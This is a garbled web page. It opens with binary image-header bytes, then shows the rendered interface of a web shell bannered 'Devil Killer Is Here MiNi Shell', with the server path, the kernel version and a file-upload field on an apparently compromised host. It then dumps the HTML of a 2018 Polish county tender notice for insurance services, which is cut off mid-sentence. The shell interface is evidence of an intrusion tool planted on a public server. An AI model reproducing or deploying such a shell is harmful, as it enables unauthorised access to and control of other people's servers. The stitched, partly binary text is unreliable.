JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20180201/511500-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 511500-N-2018 z dnia 2018-02-01 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiat Mielecki</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Ubezpieczenie mienia, odpowiedzialności cywilnej oraz ubezpieczenia komunikacyjne Powiatu Mieleckiego wraz z jednostkami organizacyjnymi na okres od 23.02.2018r. do 22.02.2020r.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Tak</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Podmiot</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Powiat Mielecki, ul. Wyspiańskiego 6, 39-300 Mielec, REGON 690581442, Zbigniew Tymuła, tel. 177800400</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Powiatowy Urząd Pracy w Mielcu, ul. Chopina 16A, 39-300 Mielec, REGON 830466865, Renata Siembab, tel. 177880050</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Powiatowe Centrum Pomocy Rodzinie w Mielcu, ul. Żeromskiego 34, 39-300 Mielec, REGON 690588266, Beata Kardyś, tel. 177800470 </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Centrum Kształcenia Praktycznego i Doskonalenia Nauczycieli w Mielcu, ul. Wojska Polskiego 2B, 39-300 Mielec, REGON 690481700, Zdzisław Nowakowski, tel. 177885194</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Dom Pomocy Społecznej im. Stefana Kardynała Wyszyńskiego w Mielcu, ul. Ks. Kard. Wyszyńskiego 16, 39-300 Mielec, REGON 830482730, Renata Lazur, tel. 177888400</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'> I Liceum Ogólnokształcące im. Stanisława Konarskiego w Mielcu, ul. Jędrusiów 1, 39-300 Mielec, REGON 000229300, Radosław Kluza, tel. 177731577</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>II Liceum Ogólnokształcącym im. Mikołaja Kopernika w Mielcu, ul. Żeromskiego 28, 39-300 Mielec, REGON 000231550, Zbigniew Rzeźnik tel. 177885168</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkół Technicznych w Mielcu, ul. Kazimierza Jagiellończyka 3, 39-300 Mielec, REGON 000037144, Mariusz Wojciechowski, tel. 177881318</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkół Budowlanych im. Żołnierzy Armii Krajowej w Mielcu, ul. Kazimierza Jagiellończyka 3, 39-300 Mielec, REGON 000198960, Stanisław Starzyk, tel. 177885289</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Powiatowy Zarząd Dróg w Mielcu, ul. Korczaka 6a, 39-300 Mielec, REGON 690587692, Jacek Krzyżewski, tel. 175837521</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkół Ekonomicznych im. Bł. Ks. Romana Sitki w Mielcu, ul. Warszawska 1, 39-300 Mielec, REGON 000234502, Marta Mysona, tel. 177731580</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkół w Radomyślu Wielkim, ul. Kościuszki 2, 39-310 Radomyśl Wielki, REGON 830448790, Stanisław Pryga, tel. 146819683</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Powiatowy Zespół Placówek Szkolno-Wychowawczych w Mielcu, ul. Królowej Jadwigi 1, 39-300 Mielec, REGON 000209757, Małgorzata Wałek, tel. 175862916</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'> Poradnia Psychologiczno-Pedagogiczna w Mielcu, ul. Sękowskiego 2B, 39-300 Mielec, REGON 001030204, Wacław Nelec, tel. 177884988 </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkół im. Prof. Janusza Groszkowskiego w Mielcu, ul. Kilińskiego 24, 39-300 Mielec, REGON 000188854, Zbigniew Witek, tel. 177888850</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Centrum Obsługi jednostek Powiatu Mieleckiego, ul. Wyspiańskiego 6, 39-300 Mielec, REGON 365038563, Anna Adamczyk, tel. 178886371</TD></TR></TABLE> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiat Mielecki</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">69058144200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Wyspiańskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">6</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">39-300 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Mielec</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podkarpackie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">17 78 00 400</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">euzar@powiat-mielecki.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">17 78 00 530</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.powiat-mielecki.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia">Powiat Mielecki przeprowadzi postępowanie o udzielenie zamówienia publicznego, dokonania wyboru najkorzystniejszej oferty i zawrze umowę generalną.</span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://powiat-mielecki.bip.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Przesyłanie lub składanie w siedzibie Zamawiajacego. </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Powiat Mielecki ul.Wyspiańskiego 6, 39-300 Mielec</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Ubezpieczenie mienia, odpowiedzialności cywilnej oraz ubezpieczenia komunikacyjne Powiatu Mieleckiego wraz z jednostkami organizacyjnymi na okres od 23.02.2018r. do 22.02.2020r.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">WA.272.1.1.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Zamówienie dzieli się na 2 części. Poszczególne części obejmują następujące rodzaje ubezpieczeń:1.1.	Część 01 zamówienia:(a)	Ubezpieczenie mienia od wszystkich ryzyk,(b)	Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk,(c)	Ubezpieczenie odpowiedzialności cywilnej w związku z prowadzoną działalnoscią i posiadanym mieniem,2.	Część 02 zamówienia:(a)	Obowiązkowe Ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych,(b)	Ubezpieczenie auto - casco,(c)	Ubezpieczenie następstw nieszczęśliwych wypadków kierowcy i pasażerów.3. Szczegółowy Opis Przedmiotu Zamówienia zawiera specyfikacja istotnych warunków zamówienia (SIWZ) oraz załączniki w szczególności załącznik nr 1 do SIWZ i załącznik nr 5 do SIWZ oraz wzory umów.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">66510000-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>66515400-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>66515000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>66516000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>66516100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>66514110-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>66512100-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 67 ust. 1 pkt 6) PZP o wartości do 25% zamówienia podstawowego. Przedmiotem zamówień będą ubezpieczenia: mienia od wszystkich ryzyk, sprzętu elektronicznego od wszystkich ryzyk, odpowiedzialności cywilnej w związku z prowadzoną działalnością i posiadanym mieniem, odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych, auto - casco, następstw nieszczęśliwych wypadków kierowcy i pasażerów.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2018-02-23</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-02-22</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: prowadzą działalność ubezpieczeniową w myśl ustawy z dnia 11 września 2015 roku o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2017 r., poz. 1170), co najmniej w zakresie tożsamym z przedmiotem niniejszego zamówienia (tj. co najmniej w grupie 8 i 9 Działu II Załącznika do ustawy o działalności ubezpieczeniowej i reasekuracyjnej - dotyczy Części 01 zamówienia oraz co najmniej w grupie 1, 3, 10 Działu II Załącznika do ustawy o działalności ubezpieczeniowej i reasekuracyjnej - dotyczy Części 02 zamówienia).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunek ten zostaje spełniony, jeżeli Wykonawca w odniesieniu do Części 01 zamówienia: posiada w ramach wewnętrznej struktury terenową jednostkę organizacyjną na terenie RP, która prowadzi likwidację szkód w zakresie oceny i likwidacji szkód z ubezpieczeń majątkowych lub ma zawartą umowę z przedsiębiorstwem świadczącym zawodowo na terenie RP usługi w zakresie oceny i likwidacji szkód z ubezpieczeń majatkowych (przedsiębiorstwo to posiada terenową jednostkę organizacyjną na terenie RP). Wskazana umowa na obsługę likwidacji szkód może być zawarta z takim przedsiębiorstwem pod warunkiem (zawieszającym lub rozwiązującym) zawarcia umowy ubezpieczenia będącej przedmiotem zamówienia.Natomiast w odniesieniu do Części 02 zamówienia, warunek ten zostaje spełniony, jeżeli Wykonawca: posiada w ramach wewnętrznej struktury terenową jednostkę organizacyjną na terenie RP, która prowadzi likwidację szkód w zakresie oceny i likwidacji szkód z ubezpieczeń komunikacyjnych lub ma zawartą umowę z przedsiębiorstwem świadczącym zawodowo na terenie RP usługi w zakresie oceny i likwidacji szkód z ubezpieczeń komunikacyjnych (przedsiębiorstwo to posiada terenową jednostkę organizacyjną na terenie RP). Wskazana umowa na obsługę likwidacji szkód może być zawarta z takim przedsiębiorstwem pod warunkiem (zawieszającym lub rozwiązującym) zawarcia umowy ubezpieczenia będącej przedmiotem zamówienia.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych innych 